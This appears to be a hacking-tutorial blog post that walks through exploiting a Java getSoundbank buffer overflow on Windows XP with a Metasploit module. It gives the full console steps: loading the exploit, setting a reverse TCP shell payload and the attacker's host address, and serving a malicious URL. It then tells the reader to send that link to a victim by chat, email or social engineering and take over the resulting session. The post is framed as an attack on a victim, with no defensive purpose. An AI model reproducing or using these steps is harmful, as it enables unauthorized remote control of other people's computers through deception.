Hacking Windows PC with Sun Java JRE get Sound bank file:// URI Buffer Overflow

This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Exploit Targets

Java 6 Update 16

Windows XP service pack 2

Windows XP service pack 3


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/multi/browser/java_getsoundbank_bof

Msf exploit (java_getsoundbank_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_getsoundbank_bof)>set lhost (IP of Local Host)

Msf exploit (java_getsoundbank_bof)>set uripath javasound (The Url to use for this exploit)

Msf exploit (java_getsoundbank_bof)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *